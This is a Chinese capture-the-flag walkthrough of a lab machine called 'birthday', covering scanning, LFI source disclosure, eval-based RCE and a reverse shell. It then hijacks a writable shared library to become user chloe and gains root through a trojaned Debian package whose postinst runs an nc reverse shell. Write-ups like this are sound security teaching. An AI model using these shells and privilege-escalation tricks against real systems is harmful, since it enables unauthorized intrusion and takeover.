难度:Hard
kali:192.168.56.104
靶机:192.168.56.149
端口扫描
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-06 10:39 CST
Nmap scan report for 192.168.56.149
Host is up (0.00016s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E8:95:BE (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
好消息端口不是很复杂 22 80两个端口
浅扫目录
┌──(root㉿kali2)-[~/Desktop]
└─# gobuster dir -u http://192.168.56.149 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.149
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,html,txt,php,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.hta.zip (Status: 403) [Size: 279]
/.hta.html (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.hta.bak (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.zip (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.bak (Status: 403) [Size: 279]
/.htpasswd.zip (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 1197] [--> /index.php?event=birthday&date=3881678400]
/index.php (Status: 302) [Size: 1197] [--> /index.php?event=birthday&date=3881678400]
/server-status (Status: 403) [Size: 279]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================
很好,很干净。
去看web
源码没什么东西,只有一张图片,进行隐写分析后发现并没有什么隐写,唯一利用点只剩url了
乱试一通,发现把data改成birthday就跳转到了birthday_party_program.php
每个都点一下试试,发现有一个可能FLI
然后下面点击here的时候还会跳转到一个计算生日的url
猜测可以命令执行,就用LFI读一下文件源码
http://192.168.56.149/birthday_party_program.php?page=/var/www/html/birthday_calculator.php
<?phpif (isset($_GET['dob'])) {$dob = addslashes($_GET['dob']);eval("\$dob = \"$dob\";");$now = new DateTime();$nextBirthday = new DateTime($dob);$nextBirthday->setDate($now->format('Y'), $nextBirthday->format('m'), $nextBirthday->format('d'));if($nextBirthday < $now) {$nextBirthday->modify('+1 year');}$interval = $now->diff($nextBirthday);echo "<p>Your next birthday is in: ".$interval->days." days!</p>";}?>搜索到一篇关于addslashes绕过的文章
使用复杂变量绕过addslashes函数实现RCE_eval('$str="'.addslashes($str).'";' );-CSDN博客
反弹个shell
┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.149] 50338
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@birthday:/var/www/html$
home下只有一个用户chloe但是无权进入,不过sudo -l可以提升权限
www-data@birthday:/var/www$ cd /home
cd /home
www-data@birthday:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Jun 28 2023 .
drwxr-xr-x 18 root root 4096 Jul 14 2023 ..
drwx------ 4 chloe chloe 4096 Jul 14 2023 chloe
www-data@birthday:/home$ cd chloe
cd chloe
bash: cd: chloe: Permission denied
www-data@birthday:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,use_ptyUser www-data may run the following commands on birthday:(chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/home$ zodiac
zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
Your Zodiac sign is: Capricorn
是一个计算星座点击脚本
看一下权限
www-data@birthday:/usr/bin$ ls -al ./zodiac
ls -al ./zodiac
-rwxr-xr-x 1 root root 16056 Jun 29 2023 ./zodiac
不能修改,那只能从动态链接库下手了
www-data@birthday:/usr/bin$ ldd ./zodiac
ldd ./zodiaclinux-vdso.so.1 (0x00007ffed7d85000)libzodiac.so => /lib/x86_64-linux-gnu/libzodiac.so (0x00007f8d26467000)libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8d26286000)/lib64/ld-linux-x86-64.so.2 (0x00007f8d26477000)
能下手的只有libzodiac.so,看一下权限
www-data@birthday:/usr/bin$ ls -al /lib/x86_64-linux-gnu/libzodiac.so
ls -al /lib/x86_64-linux-gnu/libzodiac.so
-rwxr-xrwx 1 root root 15096 Jul 6 2022 /lib/x86_64-linux-gnu/libzodiac.so
可以修改
www-data@birthday:/tmp$ cat a.c
cat a.c
#include <stdlib.h>
int main(){system("/bin/bash");
}
www-data@birthday:/tmp$ gcc -shared a.c -o a.so
gcc -shared a.c -o a.so
www-data@birthday:/tmp$ cp a.so /lib/x86_64-linux-gnu/libzodiac.so
cp a.so /lib/x86_64-linux-gnu/libzodiac.so
www-data@birthday:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,use_ptyUser www-data may run the following commands on birthday:(chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/tmp$ sudo -u chloe /usr/bin/zodiac
sudo -u chloe /usr/bin/zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
/usr/bin/zodiac: symbol lookup error: /usr/bin/zodiac: undefined symbol: get_zodiac_sign
写个简单的c发现报错
需要get_zodiac_sign这个函数,那就修改一下exp
www-data@birthday:/tmp$ cat a.c
cat a.c
#include <stdlib.h>
int get_zodiac_sign()
{system("/bin/bash");
}
int main(){get_zodiac_sign();
}
www-data@birthday:/tmp$ gcc -shared a.c -o a.so
gcc -shared a.c -o a.so
www-data@birthday:/tmp$ cp a.so /lib/x86_64-linux-gnu/libzodiac.so
cp a.so /lib/x86_64-linux-gnu/libzodiac.so
www-data@birthday:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,use_ptyUser www-data may run the following commands on birthday:(chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/tmp$ sudo -u chloe /usr/bin/zodiac
sudo -u chloe /usr/bin/zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
chloe@birthday:/tmp$ id
id
uid=1001(chloe) gid=1001(chloe) groups=1001(chloe)
chloe@birthday:/tmp$ 成功拿到chloe的权限
提权root
在opt目录下发现一个脚本,并且所属root
chloe@birthday:/opt$ ls -al
ls -al
total 16
drwxr-xr-x+ 3 root root 4096 Jul 14 2023 .
drwxr-xr-x 18 root root 4096 Jul 14 2023 ..
drwxr-xrwx 2 root root 4096 Jul 2 2023 packages
-rwxr-xr-x 1 root root 357 Jul 2 2023 script.sh
chloe@birthday:/opt$ cat script.sh
cat script.sh
#!/bin/bashURL="http://ipv4.download.thinkbroadband.com/50MB.zip"FILE="50MB.zip"if [ -f "$FILE" ]; thenrm "$FILE"
fiSTART=$(date +%s.%N)
wget -O $FILE $URL
END=$(date +%s.%N)DIFF=$(echo "$END - $START" | bc)SIZE=$(du -b $FILE | cut -f1)
SPEED=$(echo "scale=2; ($SIZE*8/1000000)/$DIFF" | bc)echo "Download speed : $SPEED Mbps"rm "$FILE"
计算从指定url下载文件所用的时间
用pspy64分析一下
发现/usr/bin/ansible-playbook /etc/ansible/install.yml 会被定时执行
2024/04/06 05:41:09 CMD: UID=0 PID=25666 | /usr/bin/python3 /usr/bin/ansible-playbook /etc/ansible/install.yml chloe@birthday:~$ ls -al /etc/ansible/install.yml
ls -al /etc/ansible/install.yml
-rw-r--r-- 1 root root 1174 Jul 13 2023 /etc/ansible/install.yml
chloe@birthday:~$ cat /etc/ansible/install.yml
cat /etc/ansible/install.yml
- hosts: clientstasks:- name: Run script /opt/script.shansible.builtin.command: /opt/script.sh- name: Install debian packagesansible.builtin.apt:deb: "/opt/packages/{{ item }}"loop:- abigail-doc_2.2-2_all.deb- airspy_1.0.10-2+b1_amd64.deb- aobook_1.0.3-3_amd64.deb- auto-07p_0.9.2+dfsg-3+b3_amd64.deb- bacula-console_9.6.7-7_amd64.deb- name: Copy /var/www/html to /var/backup/site.zipansible.builtin.archive:path: /var/www/htmldest: /var/backup/site.zip- name: Check who is connectedansible.builtin.shell: who > /tmp/who.txt- name: Add entry in /etc/hostsansible.builtin.lineinfile:path: /etc/hostsline: "127.0.0.1 localhost.me"- name: Install apt packageansible.builtin.apt:name: htopstate: present- name: Install netdataansible.builtin.apt:name: netdatastate: present- name: Run netdata serviceansible.builtin.systemd:name: netdataenabled: yesstate: started
这是个YAML 格式的 Ansible Playbook 文件
1.执行/opt/script.sh这个脚本
2.安装/opt/packages/下面的debian包
3.将/var/www/html打包成/var/backup/site.zip
4.执行who的指令,将结果输出到/tmp/who.txt
5.在/etc/hosts中将127.0.0.1映射到localhost.me
6.安装htop,netdata,启用netdata服务
利用方式是创建一个可以反弹shell的debian包
这一块我不会直接看wp了
chloe@birthday:/dev/shm$ mkdir deb
chloe@birthday:/dev/shm$ cd deb
chloe@birthday:/dev/shm/deb$ mkdir -p package/DEBIAN
chloe@birthday:/dev/shm/deb$ touch package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ touch package/DEBIAN/control
chloe@birthday:/dev/shm/deb$ nano package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ nano package/DEBIAN/control
chloe@birthday:/dev/shm/deb$ cat package/DEBIAN/postinst
nc -e /bin/bash 192.168.56.104 4444
chloe@birthday:/dev/shm/deb$ cat package/DEBIAN/control
Package: revshell
Version: 1.0
Architecture: all
Description: revshell
Maintainer: crom
chloe@birthday:/dev/shm/deb$ chmod +x package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ dpkg-deb --build package
chloe@birthday:/dev/shm/deb$ mv package.deb /opt/packages/aobook_1.0.3-3_amd64.deb
replace '/opt/packages/aobook_1.0.3-3_amd64.deb', overriding mode 0644 (rw-r--r--)? ykali开个监听就能拿到root
┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.149] 51688
uid=0(root) gid=0(root) groups=0(root)
cat /root/r*
![[Semi-笔记]Switching Temporary Teachers for Semi-Supervised Semantic Segmentation](https://img-blog.csdnimg.cn/direct/2499c7feca1b4841aaf9e8b28e412fd6.png)
